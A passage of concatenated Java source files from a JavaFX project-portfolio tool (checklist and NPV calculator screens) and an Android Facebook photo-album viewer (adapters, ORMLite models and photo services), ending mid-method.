this.cumulativeNPV.set(cumulativeNPV);
}
}
<file_sep>/src/utils/Utils.java
package utils;
import com.sun.org.apache.xpath.internal.operations.String;
import javafx.scene.image.Image;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
/**
* Created by <NAME> on 4/14/2017.
*/
public class Utils {
public static java.lang.String[] tabMessages = {"Search when does the project will start obtaining revenues","The value of a project including the investment rate and taxes", "Criteria filter for the viability of a project", "Big picture of the depreciation of items","Detailed filter for project viability evaluation"};
public static Image geErrorIcon(){
try {
Image iconError = new Image(new FileInputStream("resources\\icons\\ic_error_black_24dp_1x.png"));
return iconError;
} catch (FileNotFoundException e) {
e.printStackTrace();
}
return null;
}
}
<file_sep>/src/Main.java
import controllers.Home;
import controllers.Welcome;
import javafx.application.Application;
import javafx.collections.ObservableList;
import javafx.stage.Stage;
import java.awt.*;
import java.io.File;
public class Main extends Application {
@Override
public void start(Stage primaryStage) throws Exception{
new Welcome().launchWelcomeScene(primaryStage);
//new Home().displayHomeScreen(primaryStage);
/*Parent root = FXMLLoader.load(getClass().getResource("fxml/Welcome.fxml"));
primaryStage.setTitle("Project Portfolio Evaluation Tool");
primaryStage.setScene(new Scene(root, 800, 600));
primaryStage.setResizable(true);
primaryStage.show();
*/
}
public static void main(String[] args) {
launch(args);
}
}
<file_sep>/src/models/ChecklistRow.java
package models;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import javafx.beans.property.SimpleStringProperty;
/**
* Created by <NAME> on 4/25/2017.
*/
public class ChecklistRow extends RecursiveTreeObject<ChecklistRow>{
SimpleStringProperty topic;
SimpleStringProperty question;
SimpleStringProperty answer;
public ChecklistRow(String topic, String question, String answer){
this.topic = new SimpleStringProperty(topic);
this.question = new SimpleStringProperty(question);
this.answer = new SimpleStringProperty(answer);
}
public String getAnswer() {
return answer.get();
}
public SimpleStringProperty answerProperty() {
return answer;
}
public void setAnswer(String answer) {
this.answer.set(answer);
}
public String getTopic() {
return topic.get();
}
public SimpleStringProperty topicProperty() {
return topic;
}
public void setTopic(String topic) {
this.topic.set(topic);
}
public String getQuestion() {
return question.get();
}
public SimpleStringProperty questionProperty() {
return question;
}
public void setQuestion(String question) {
this.question.set(question);
}
}
<file_sep>/src/controllers/Checklist.java
package controllers;
import com.itextpdf.text.DocumentException;
import com.jfoenix.controls.*;
import com.jfoenix.controls.cells.editors.TextFieldEditorBuilder;
import com.jfoenix.controls.cells.editors.base.GenericEditableTreeTableCell;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import javafx.beans.value.ChangeListener;
import javafx.beans.value.ObservableValue;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.event.EventHandler;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.control.Label;
import javafx.scene.control.TreeTableColumn;
import javafx.scene.control.cell.ComboBoxTableCell;
import javafx.scene.input.MouseEvent;
import javafx.scene.layout.AnchorPane;
import javafx.util.converter.DefaultStringConverter;
import models.ChecklistRow;
import utils.PDFMaker;
import java.io.IOException;
import java.net.URL;
import java.util.ResourceBundle;
import java.util.function.Function;
/**
* Created by <NAME> on 4/25/2017.
*/
public class Checklist implements Initializable {
@FXML private JFXTextField searchField;
@FXML private AnchorPane root;
@FXML private Label treeTableViewCount;
@FXML private JFXTreeTableView<ChecklistRow> treeTableView;
@FXML private JFXTreeTableColumn<ChecklistRow, String> questionColumn;
@FXML private JFXTreeTableColumn<ChecklistRow, String> topicColumn;
@FXML private JFXTreeTableColumn<ChecklistRow, String> answerColumn;
@FXML private JFXButton buttonSavePDF;
private ObservableList<ChecklistRow> data;
@Override
public void initialize(URL location, ResourceBundle resources) {
data = FXCollections.observableArrayList();
getTableData();
setupTable();
buttonSavePDF.setOnMouseClicked(new EventHandler<MouseEvent>() {
@Override
public void handle(MouseEvent event) {
try {
//getChartImage();
PDFMaker.makePDFChecklist("Checklist", data);
//TODO Popup sucess save file!
} catch (DocumentException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
});
}
private <T> void setupCellValueFactory(JFXTreeTableColumn<ChecklistRow, T> column, Function<ChecklistRow, ObservableValue<T>> mapper) {
column.setCellValueFactory((TreeTableColumn.CellDataFeatures<ChecklistRow, T> param) -> {
if (column.validateValue(param)) {
return mapper.apply(param.getValue().getValue());
} else {
return column.getComputedValue(param);
}
});
}
private void setupTable() {
setupCellValueFactory(topicColumn , ChecklistRow::topicProperty);
setupCellValueFactory(questionColumn, ChecklistRow::questionProperty);
setupCellValueFactory(answerColumn ,ChecklistRow::answerProperty);
answerColumn.setCellFactory((TreeTableColumn<ChecklistRow, String> param) -> {
return new GenericEditableTreeTableCell<>(
new TextFieldEditorBuilder());
});
answerColumn.setOnEditCommit((TreeTableColumn.CellEditEvent<ChecklistRow, String> t) -> {
t.getTreeTableView().getTreeItem(t.getTreeTablePosition().getRow()).getValue().answerProperty().set(t.getNewValue());
});
treeTableView.setRoot(new RecursiveTreeItem<ChecklistRow>(data, RecursiveTreeObject::getChildren));
treeTableView.setShowRoot(false);
treeTableView.setEditable(true);
searchField.textProperty().addListener(setupSearchField(treeTableView));
}
private ChangeListener<String> setupSearchField(final JFXTreeTableView<ChecklistRow> tableView) {
return (o, oldVal, newVal) ->
tableView.setPredicate(paybackProp -> {
final ChecklistRow temp = paybackProp.getValue();
return temp.getTopic().contains(newVal)
|| temp.getQuestion().contains(newVal)
|| temp.getAnswer().contains(newVal);
});
}
private void getTableData() {
for (int i = 0; i < 20; i++) {
data.add(new ChecklistRow("","",""));
}
data.get(0).setTopic("Strategy/alignment");
data.get(0).setQuestion("What specific organization strategy does this project align with?");
data.get(1).setTopic("Driver");
data.get(1).setQuestion("What business problem does the project solve?");
data.get(2).setTopic("Success metrics");
data.get(2).setQuestion("How will measure success?");
data.get(3).setTopic("Sponsorship");
data.get(3).setQuestion("Who is the project sponsor?");
data.get(4).setTopic("Risk");
data.get(4).setQuestion("What is the impact of not doing this project?");
data.get(5).setTopic("Risk");
data.get(5).setQuestion("What is the project risk to our organization?");
data.get(6).setTopic("Risk");
data.get(6).setQuestion("Where does the proposed project fit in our risk profile?");
data.get(7).setTopic("Benefits, value ");
data.get(7).setQuestion("What is the value of the project organization?");
data.get(8).setTopic("Benefits, value");
data.get(8).setQuestion("When will the project shows result?");
data.get(9).setTopic("Objectives");
data.get(9).setQuestion("What are the project objectives?");
data.get(10).setTopic("Organization Culture");
data.get(10).setQuestion("Is our organization culture right for this type of project?");
data.get(11).setTopic("Resources");
data.get(11).setQuestion("Will internal resources be available for this project?");
data.get(12).setTopic("Approach");
data.get(12).setQuestion("Will we build or buy?");
data.get(13).setTopic("Schedule");
data.get(13).setQuestion("How long will this project take?");
data.get(14).setTopic("Schedule");
data.get(14).setQuestion("Is the timeline realistic?");
data.get(15).setTopic("Training/resources");
data.get(15).setQuestion("Will staff training be required?");
data.get(16).setTopic("Finance/portfolio");
data.get(16).setQuestion("What is the estimated cost of the project?");
data.get(17).setTopic("Portfolio");
data.get(17).setQuestion("Is this a new initiative or path of an existing initiative?");
data.get(18).setTopic("Portfolio");
data.get(18).setQuestion("How does this project interact with current projects?");
data.get(19).setTopic("Technology");
data.get(19).setQuestion("Is the technology available or new?");
}
}
<file_sep>/src/controllers/NPV.java
package controllers;
import com.itextpdf.text.DocumentException;
import com.jfoenix.controls.*;
import com.jfoenix.controls.cells.editors.DoubleTextFieldEditorBuilder;
import com.jfoenix.controls.cells.editors.base.GenericEditableTreeTableCell;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import com.jfoenix.validation.NumberValidator;
import javafx.beans.binding.Bindings;
import javafx.beans.property.IntegerProperty;
import javafx.beans.value.ChangeListener;
import javafx.beans.value.ObservableValue;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.embed.swing.SwingFXUtils;
import javafx.event.EventHandler;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.Node;
import javafx.scene.SnapshotParameters;
import javafx.scene.chart.BarChart;
import javafx.scene.chart.XYChart;
import javafx.scene.control.Label;
import javafx.scene.control.TreeTableColumn;
import javafx.scene.image.ImageView;
import javafx.scene.image.WritableImage;
import javafx.scene.input.MouseEvent;
import javafx.scene.layout.AnchorPane;
import models.NPVRow;
import models.PaybackRow;
import operations.Projection;
import utils.PDFMaker;
import utils.Utils;
import javax.imageio.ImageIO;
import java.io.File;
import java.io.IOException;
import java.net.URL;
import java.util.ResourceBundle;
import java.util.function.Function;
/**
* Created by <NAME> on 4/19/2017.
*/
public class NPV implements Initializable {
@FXML private JFXComboBox<Integer> comboBoxPeriods;
@FXML private AnchorPane root;
@FXML private JFXTextField textFieldInterestRate;
@FXML private JFXTextField textFieldTaxRate;
@FXML private JFXButton treeTableViewAdd;
@FXML private JFXTextField searchField;
@FXML private BarChart<String , Number> barChart;
@FXML private JFXTreeTableView<NPVRow> treeTableView;
@FXML private JFXTreeTableColumn<NPVRow, Integer> periodColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> outflowColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> inflowColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> netCashFlowColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> NPVColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> cumulativeNVPColumn;
@FXML private JFXTextField textFieldResult;
@FXML private Label treeTableViewCount;
@FXML private JFXButton treeTableViewRemove;
@FXML private JFXButton buttonClear;
@FXML private JFXButton buttonSavePDF;
private static final String PREFIX = "( ";
private static final String POSTFIX = " )";
private ObservableList<NPVRow> data;
private void getChartImage(){
WritableImage image = barChart.snapshot(new SnapshotParameters(),null);
File file = new File("NPVChart.png");
try {
ImageIO.write(SwingFXUtils.fromFXImage(image, null), "png", file);
} catch (IOException e) {
// TODO: handle exception here
}
}
@Override
public void initialize(URL location, ResourceBundle resources) {
data = FXCollections.observableArrayList();
data.add(new NPVRow(0,0,0,0,0,0));
setupTable();
setupComboBox();
setupValidator();
setUpBarChart();
buttonSavePDF.setOnMouseClicked(new EventHandler<MouseEvent>() {
@Override
public void handle(MouseEvent event) {
try {
getChartImage();
PDFMaker.makePDFNPV("Net Present Value",getInterestRate(),data.size(),getTaxRate(),
data.get(data.size()-1).getCumulativeNPV(), data);
//TODO Popup sucess save file!
} catch (DocumentException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
});
buttonClear.setOnMouseClicked(e->{
data.clear();
final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
currCountProp.set(data.size());
});
}
private double getInterestRate(){
if(textFieldInterestRate.getText()!= null && !textFieldInterestRate.getText().isEmpty()){
try{
double interestRate = Double.parseDouble(textFieldInterestRate.getText());
return interestRate;
}catch (Exception e){
System.out.println("ERROR "+e);
return 0;
}
}
return 0;
}
private double getTaxRate(){
if(textFieldInterestRate.getText()!= null && !textFieldInterestRate.getText().isEmpty()){
try{
double taxRate = Double.parseDouble(textFieldTaxRate.getText());
return taxRate;
}catch (Exception e){
return 0;
}
}
return 0;
}
private void setUpBarChart() {
barChart.getXAxis().setLabel("Period");
barChart.getXAxis().setLabel("USD");
barChart.setData(getChartData());
}
private ObservableList<XYChart.Series<String, Number>> getChartData(){
ObservableList<XYChart.Series<String, Number>> newData = FXCollections.observableArrayList();
XYChart.Series<String, Number> series = new XYChart.Series<>();
series.setName("Cash Flow");
for (int i = 0; i < data.size(); i++) {
NPVRow temp = data.get(i);
final XYChart.Data<String, Number> dataForSerie = new XYChart.Data<>(Integer.toString(temp.periodProperty().intValue()),temp.netCashFlowProperty().doubleValue());
dataForSerie.nodeProperty().addListener(new ChangeListener<Node>() {
@Override
public void changed(ObservableValue<? extends Node> observable, Node oldValue, Node newNode) {
if (newNode != null) {
if (dataForSerie.getYValue().intValue() >= 0 ) {
newNode.setStyle("-fx-bar-fill: #00C853;");
} else {
newNode.setStyle("-fx-bar-fill: #F44336;");
}
}
}
});
series.getData().add(dataForSerie);
//series.getData().add(new XYChart.Data(Integer.toString(temp.periodProperty().intValue()), temp.netCashFlowProperty().doubleValue()));
}
newData.addAll(series);
return newData;
}
private void updateBarChart(){
textFieldResult.setText(String.valueOf(data.get(data.size()-1).getCumulativeNPV()));
barChart.setData(getChartData());
}
private void setupValidator() {
NumberValidator interestRateValidator = new NumberValidator();
NumberValidator taxRateValidator = new NumberValidator();
textFieldInterestRate.getValidators().add(interestRateValidator);
textFieldTaxRate.getValidators().add(taxRateValidator);
interestRateValidator.setMessage("Numeric value 0-100%");
taxRateValidator.setMessage("Numeric value 0-100%");
interestRateValidator.setIcon(new ImageView(Utils.geErrorIcon()));
taxRateValidator.setIcon(new ImageView(Utils.geErrorIcon()));
textFieldTaxRate.focusedProperty().addListener(new ChangeListener<Boolean>() {
@Override
public void changed(ObservableValue<? extends Boolean> observable, Boolean oldValue, Boolean newValue) {
if(!newValue){
textFieldTaxRate.validate();
}
}
});
textFieldInterestRate.focusedProperty().addListener(new ChangeListener<Boolean>() {
@Override
public void changed(ObservableValue<? extends Boolean> observable, Boolean oldValue, Boolean newValue) {
if(!newValue){
textFieldInterestRate.validate();
}
}
});
}
private void setupComboBox() {
for (int i = 1; i <= 100; i++) {
comboBoxPeriods.getItems().add(i);
}
comboBoxPeriods.valueProperty().addListener(new ChangeListener<Integer>() {
@Override
public void changed(ObservableValue<? extends Integer> observable, Integer oldValue, Integer newValue) {
addPeriods(newValue);
}
});
}
private void printData(){
for (int i = 0; i < data.size(); i++) {
NPVRow temp = data.get(i);
System.out.println("p:"+temp.periodProperty().intValue()+" outf: "+temp.outflowProperty().doubleValue()
+" in: "+temp.inflowProperty().doubleValue()+" ncf:"+temp.netCashFlowProperty().doubleValue()
+" npv:"+temp.netPresentValueProperty().doubleValue() +" Cnpv "+temp.cumulativeNPVProperty().doubleValue());
}
}
private void addPeriods(int numPeriods) {
data.clear();
for (int i = 0; i <= numPeriods; i++) {
data.add(new NPVRow( getDataIndex(),0,0,0,0,0) );
}
updateBarChart();
final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
currCountProp.set(data.size());
}
private void setupTable() {
setupCellValueFactory(periodColumn,p->p.periodProperty().asObject());
setupCellValueFactory(outflowColumn,p->p.outflowProperty().asObject());
setupCellValueFactory(inflowColumn,p->p.inflowProperty().asObject());
setupCellValueFactory(netCashFlowColumn,p->p.netCashFlowProperty().asObject());
setupCellValueFactory(NPVColumn,p->p.netPresentValueProperty().asObject());
setupCellValueFactory(cumulativeNVPColumn,p->p.cumulativeNPVProperty().asObject());
outflowColumn.setCellFactory((TreeTableColumn<NPVRow, Double> param) -> {
return new GenericEditableTreeTableCell<>(
new DoubleTextFieldEditorBuilder());
});
outflowColumn.setOnEditCommit((TreeTableColumn.CellEditEvent<NPVRow, Double> t) -> {
t.getTreeTableView().getTreeItem(t.getTreeTablePosition().getRow()).getValue().outflowProperty().set(t.getNewValue());
data = Projection.calculateNPV(data,getInterestRate(),getTaxRate());
updateBarChart();
//printData();
});
inflowColumn.setCellFactory((TreeTableColumn<NPVRow, Double> param) -> {
return new GenericEditableTreeTableCell<>(
new DoubleTextFieldEditorBuilder());
});
inflowColumn.setOnEditCommit((TreeTableColumn.CellEditEvent<NPVRow, Double> t) -> {
t.getTreeTableView().getTreeItem(t.getTreeTablePosition().getRow()).getValue().inflowProperty().set(t.getNewValue());
//data = Projection.calculatePayback(data,Double.parseDouble(textFieldPrincipal.getText()),Double.parseDouble(textFieldInterestRate.getText()));
data = Projection.calculateNPV(data,getInterestRate(),getTaxRate());
updateBarChart();
//printData();
});
treeTableViewAdd.setOnMouseClicked((e) -> {
data.add(new NPVRow(getDataIndex(),0,0,0,0,0));
updateBarChart();
final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
currCountProp.set(currCountProp.get() + 1);
//TODO make get textfield methods to make validation
//data = Projection.calculatePayback(data,Double.parseDouble(textFieldPrincipal.getText()),Double.parseDouble(textFieldInterestRate.getText()));
});
treeTableViewRemove.setOnMouseClicked((e) -> {
data.remove(treeTableView.getSelectionModel().selectedItemProperty().get().getValue());
reCalculatePeriods();
updateBarChart();
final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
currCountProp.set(currCountProp.get() - 1);
//TODO make get textfield methods to make validation
//data = Projection.calculatePayback(data,Double.parseDouble(textFieldPrincipal.getText()),Double.parseDouble(textFieldInterestRate.getText()));
});
treeTableView.setRoot(new RecursiveTreeItem<>(data, RecursiveTreeObject::getChildren));
treeTableView.setShowRoot(false);
treeTableView.setEditable(true);
treeTableViewCount.textProperty().bind(Bindings.createStringBinding(()->PREFIX + treeTableView.getCurrentItemsCount()
+ POSTFIX, treeTableView.currentItemsCountProperty()));
searchField.textProperty().addListener(setupSearchField(treeTableView));
}
private ChangeListener<String> setupSearchField(final JFXTreeTableView<NPVRow> tableView) {
return (o, oldVal, newVal) ->
tableView.setPredicate(paybackProp -> {
final NPVRow temp = paybackProp.getValue();
return Integer.toString(temp.periodProperty().get()).contains(newVal)
|| Double.toString(temp.outflowProperty().get()).contains(newVal)
|| Double.toString(temp.inflowProperty().get()).contains(newVal)
|| Double.toString(temp.netCashFlowProperty().get()).contains(newVal)
|| Double.toString(temp.netCashFlowProperty().get()).contains(newVal)
|| Double.toString(temp.cumulativeNPVProperty().get()).contains(newVal) ;
});
}
private void reCalculatePeriods() {
for (int i = 0; i < data.size(); i++) {
data.get(i).setPeriod(i) ;
}
}
private int getDataIndex (){
if(data.size() <=0 ){
return 0;
}else{
return data.get(data.size()-1).getPeriod() +1;
}
}
private <T> void setupCellValueFactory(JFXTreeTableColumn<NPVRow, T> column, Function<NPVRow, ObservableValue<T>> mapper) {
column.setCellValueFactory((TreeTableColumn.CellDataFeatures<NPVRow, T> param) -> {
if (column.validateValue(param)) {
return mapper.apply(param.getValue().getValue());
} else {
return column.getComputedValue(param);
}
});
}
}
| 52e229a740b21a67c10590cb9371bb0771cb3a03 | [
"Java"
] | 6 | Java | martinrzg/Project_Portfolio_Evaluation_Tool | 4b2de3221a763cf6d1f2f3bdf5309079c654f6ef | bb6c2718b2401707ea480f2080f002c11847f379 |
refs/heads/master | <repo_name>n3rdgir1/trello_react_project<file_sep>/src/components.jsx
import React from 'react';
/* Define Card Component Here*/
/* Column Component */
class CardColumn extends React.Component {
render() {
return (<div><span>Hello</span></div>);
}
}
export default CardColumn;
| ca7a592d31ad57f3bca0bae660463889e6e8a562 | [
"JavaScript"
] | 1 | JavaScript | n3rdgir1/trello_react_project | f3e514e1029282210e4ac6c87d12de98685916ad | e91a9bf0ec978059cbf6d096c15e2ba8acfaef42 |
refs/heads/master | <repo_name>z0lope0z/pepemon<file_sep>/src/com/lopefied/pepemon/ViewPhotoActivity.java
package com.lopefied.pepemon;
import com.lopefied.pepemon.util.ImageLoader;
import com.lopefied.pepemon.widgets.TouchImageView;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
import android.view.Window;
/**
*
* @author <NAME>
*
*/
public class ViewPhotoActivity extends Activity {
public static final String TAG = ViewPhotoActivity.class.getSimpleName();
public static final String PHOTO_URL = "photo_url";
@Override
public void onCreate(Bundle savedInstanceState) {
requestWindowFeature(Window.FEATURE_NO_TITLE);
super.onCreate(savedInstanceState);
setContentView(R.layout.view_photo);
init();
}
private void init() {
Bundle extras = getIntent().getExtras();
String photoURL = null;
if (extras != null) {
photoURL = extras.getString(PHOTO_URL);
Log.i(TAG, "Got albumID : " + photoURL);
if (photoURL != null) {
TouchImageView imageView = (TouchImageView) findViewById(R.id.imageView);
ImageLoader imageLoader = ImageLoader.getInstance(this);
imageView.setImageBitmap(imageLoader.getBitmap(photoURL));
imageView.setMaxZoom(4f);
}
}
}
}
<file_sep>/src/com/lopefied/pepemon/provider/impl/AlbumPhotosProviderImpl.java
package com.lopefied.pepemon.provider.impl;
import java.util.List;
import android.app.ProgressDialog;
import android.util.Log;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.provider.AlbumPhotosListener;
import com.lopefied.pepemon.provider.AlbumPhotosProvider;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.task.GetAlbumPhotosTask;
import com.lopefied.pepemon.task.GetAlbumPhotosTask.IAlbumPhotosDownloader;
public class AlbumPhotosProviderImpl implements AlbumPhotosProvider {
public static final String TAG = AlbumPhotosProvider.class.getSimpleName();
public static final Integer LIMIT = 8;
private PhotoService photoService;
private ProgressDialog progressDialog;
private String accessToken;
private Integer pageCount;
private AlbumPhotosDownloader albumPhotosDownloader;
public AlbumPhotosProviderImpl(PhotoService photoService,
ProgressDialog progressDialog, String accessToken) {
this.photoService = photoService;
this.progressDialog = progressDialog;
this.accessToken = accessToken;
this.albumPhotosDownloader = new AlbumPhotosDownloader();
}
@Override
public void loadInit(AlbumPhotosListener albumPhotosListener, Album album) {
List<Photo> cacheList = photoService.getAlbumPhotos(album, LIMIT);
if (cacheList.size() > 0) {
albumPhotosListener.addNewPhotos(cacheList);
} else {
AlbumPhotosDownloader albumPhotosDownloader = new AlbumPhotosDownloader(
albumPhotosListener, progressDialog);
loadFromServer(albumPhotosListener, album, 0, albumPhotosDownloader);
}
}
@Override
public void loadMore(final AlbumPhotosListener albumPhotosListener,
Photo lastPhoto, Album album, Integer totalItems) {
Photo lastPhotoCache = photoService.getLastPhoto(album);
albumPhotosDownloader = new AlbumPhotosDownloader(albumPhotosListener);
if (lastPhotoCache != null) {
if (lastPhoto == null) {
loadInit(albumPhotosListener, album);
} else if (!lastPhoto.equals(lastPhotoCache)) {
albumPhotosListener.addNewPhotos(loadFromCache(
albumPhotosListener, lastPhoto, album));
} else {
loadFromServer(albumPhotosListener, album, totalItems,
albumPhotosDownloader);
}
} else
loadFromServer(albumPhotosListener, album, totalItems,
albumPhotosDownloader);
}
@Override
public Boolean isDownloading() {
Log.i(TAG, "The downloader is currently : "
+ albumPhotosDownloader.isDownloading);
return albumPhotosDownloader.isDownloading;
}
private void increasePageCount() {
pageCount = pageCount + LIMIT;
}
private void loadFromServer(final AlbumPhotosListener albumPhotosListener,
final Album album, final Integer currentPage,
AlbumPhotosDownloader albumPhotosDownloader) {
Log.i(TAG, "Loading new photos from server.. ");
GetAlbumPhotosTask task = new GetAlbumPhotosTask(photoService,
albumPhotosDownloader, accessToken, currentPage);
task.execute(album);
}
private List<Photo> loadAllFromCache(Album album) {
Log.i(TAG, "Loading all photos from cache.. ");
return photoService.getAlbumPhotos(album);
}
private List<Photo> loadFromCache(
final AlbumPhotosListener albumPhotosListener, Photo lastPhoto,
Album album) {
Log.i(TAG, "Loading filtered photos from cache.. ");
return photoService.getAlbumPhotos(album, PhotoService.BACKWARDS,
lastPhoto, LIMIT);
}
private class AlbumPhotosDownloader implements IAlbumPhotosDownloader {
Boolean isDownloading;
AlbumPhotosListener albumPhotosListener;
ProgressDialog progressDialog;
public AlbumPhotosDownloader() {
this.isDownloading = false;
}
public AlbumPhotosDownloader(AlbumPhotosListener albumPhotosListener) {
this.isDownloading = false;
this.albumPhotosListener = albumPhotosListener;
}
public AlbumPhotosDownloader(AlbumPhotosListener albumPhotosListener,
ProgressDialog progressDialog) {
this.isDownloading = false;
this.albumPhotosListener = albumPhotosListener;
this.progressDialog = progressDialog;
}
@Override
public void startingDownload() {
this.isDownloading = true;
albumPhotosListener.startingDownload();
if (progressDialog != null) {
progressDialog.show();
}
}
@Override
public void noMoreAlbumPhotos() {
this.isDownloading = false;
albumPhotosListener.noMorePhotos();
if (progressDialog != null) {
progressDialog.dismiss();
}
}
@Override
public void foundAlbumPhotos(List<Photo> photoList) {
this.isDownloading = false;
albumPhotosListener.addNewPhotos(photoList);
if (progressDialog != null) {
progressDialog.dismiss();
}
}
}
}
<file_sep>/src/com/lopefied/pepemon/db/model/Photo.java
package com.lopefied.pepemon.db.model;
import com.j256.ormlite.field.DatabaseField;
import com.j256.ormlite.table.DatabaseTable;
/**
*
* @author <NAME>
*
*/
@DatabaseTable(tableName = "photo")
public class Photo {
public static final String ID_PK = "ID";
public static final String PHOTO_ID = "photo_id";
public static final String ALBUM = "album";
@DatabaseField(columnName = ID_PK, generatedId = true)
private Integer ID;
@DatabaseField(columnName = PHOTO_ID)
private String photoID;
@DatabaseField(columnName = "photo_url")
private String photoURL;
@DatabaseField(foreign = true, foreignAutoRefresh = true, columnName = ALBUM)
private Album album;
public Photo() {
}
public Photo(String photoURL, String photoID) {
super();
this.photoURL = photoURL;
this.photoID = photoID;
}
public Integer getID() {
return ID;
}
public void setID(Integer iD) {
ID = iD;
}
public String getPhotoID() {
return photoID;
}
public void setPhotoID(String photoID) {
this.photoID = photoID;
}
public String getPhotoURL() {
return photoURL;
}
public void setPhotoURL(String photoURL) {
this.photoURL = photoURL;
}
public Album getAlbum() {
return album;
}
public void setAlbum(Album album) {
this.album = album;
}
@Override
public int hashCode() {
final int prime = 31;
int result = 1;
result = prime * result + ((photoID == null) ? 0 : photoID.hashCode());
return result;
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (getClass() != obj.getClass())
return false;
Photo other = (Photo) obj;
if (photoID == null) {
if (other.photoID != null)
return false;
} else if (!photoID.equals(other.photoID))
return false;
return true;
}
}
<file_sep>/src/com/lopefied/pepemon/adapter/AlbumListAdapter.java
package com.lopefied.pepemon.adapter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import android.content.Context;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.View.OnClickListener;
import android.view.ViewGroup;
import android.widget.ArrayAdapter;
import android.widget.ImageView;
import android.widget.TextView;
import com.lopefied.pepemon.R;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.util.FacebookImageLoader;
/**
* @author <NAME>
*/
public class AlbumListAdapter extends ArrayAdapter<Album> {
public static final String TAG = AlbumListAdapter.class.getSimpleName();
private FacebookImageLoader imageLoader;
private List<Album> albumList = new ArrayList<Album>();
private Context mContext;
private IAlbumListAdapter albumListAdapterListener;
public AlbumListAdapter(Context context, int textViewResourceId,
List<Album> albumList, IAlbumListAdapter albumListAdapter, String accessToken) {
super(context, textViewResourceId, albumList);
this.mContext = context;
this.albumList = albumList;
this.imageLoader = FacebookImageLoader.getInstance(context, accessToken);
this.albumListAdapterListener = albumListAdapter;
}
public void clearCache() {
System.gc();
Log.i(TAG, "Clearing cache");
imageLoader.clearCache();
}
public void addAll(Collection<? extends Album> collection) {
albumList.addAll(collection);
}
public int getCount() {
return this.albumList.size();
}
public Album getItem(int index) {
return this.albumList.get(index);
}
public List<Album> getList() {
return this.albumList;
}
public View getView(int position, View convertView, ViewGroup parent) {
View row = convertView;
ViewHolder holder;
if (row == null) {
LayoutInflater inflater = (LayoutInflater) this.getContext()
.getSystemService(Context.LAYOUT_INFLATER_SERVICE);
row = inflater.inflate(R.layout.item_album, parent, false);
//View holder for smooth scrolling
holder = new ViewHolder();
holder.lblTitle = (TextView) row.findViewById(R.id.lblTitle);
holder.imgAlbumCover = (ImageView) row.findViewById(R.id.imageView);
row.setTag(holder);
} else {
final Album album = getItem(position);
holder = (ViewHolder) row.getTag();
imageLoader.displayImage(album.getAlbumPhotoID(), holder.imgAlbumCover);
holder.imgAlbumCover.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
albumListAdapterListener.selected(album);
}
});
holder.lblTitle.setText(album.getAlbumName());
}
return row;
}
@Override
public boolean isEnabled(int position) {
return false;
}
public interface IAlbumListAdapter {
public String getFBToken();
public void selected(Album album);
}
static class ViewHolder {
public TextView lblTitle;
public ImageView imgAlbumCover;
}
}
<file_sep>/src/com/lopefied/pepemon/service/PhotoService.java
package com.lopefied.pepemon.service;
import java.util.List;
import org.json.JSONException;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.service.exception.NoPhotosExistException;
public interface PhotoService {
public static final int BACKWARDS = 0;
public static final int FORWARDS = 1;
/**
* Converts a json string as a json array
*
* @param response
* @return
*/
public List<Photo> processJSONArrayResponse(String response,
String accessToken, Album album) throws NoPhotosExistException,
JSONException;
public Boolean isCached();
public Photo getLastPhoto(Album album);
public List<Photo> getAlbumPhotos(Album album);
public List<Photo> getAlbumPhotos(Album album, Integer limit);
public List<Photo> getAlbumPhotos(Album album, int direction,
Photo photoID, Integer limit);
}
<file_sep>/src/com/lopefied/pepemon/service/impl/PhotoServiceImpl.java
package com.lopefied.pepemon.service.impl;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import com.j256.ormlite.dao.Dao;
import com.j256.ormlite.stmt.PreparedQuery;
import com.j256.ormlite.stmt.QueryBuilder;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.service.exception.NoPhotosExistException;
import com.lopefied.pepemon.util.FBParseUtils;
public class PhotoServiceImpl implements PhotoService {
private Dao<Photo, Integer> photoDAO;
public PhotoServiceImpl(Dao<Photo, Integer> photoDAO) {
this.photoDAO = photoDAO;
try {
photoDAO.setObjectCache(false);
} catch (SQLException e) {
e.printStackTrace();
}
}
@Override
public List<Photo> processJSONArrayResponse(String response,
String accessToken, Album album) throws NoPhotosExistException,
JSONException {
List<Photo> photoList = new ArrayList<Photo>();
JSONObject JOTemp = new JSONObject(response);
JSONArray JAAlbumPhotos = JOTemp.getJSONArray("data");
if (JAAlbumPhotos.length() == 0) {
throw new NoPhotosExistException(album.getAlbumID());
} else {
// PAGING JSONOBJECT
Photo photo;
for (int i = 0; i < JAAlbumPhotos.length(); i++) {
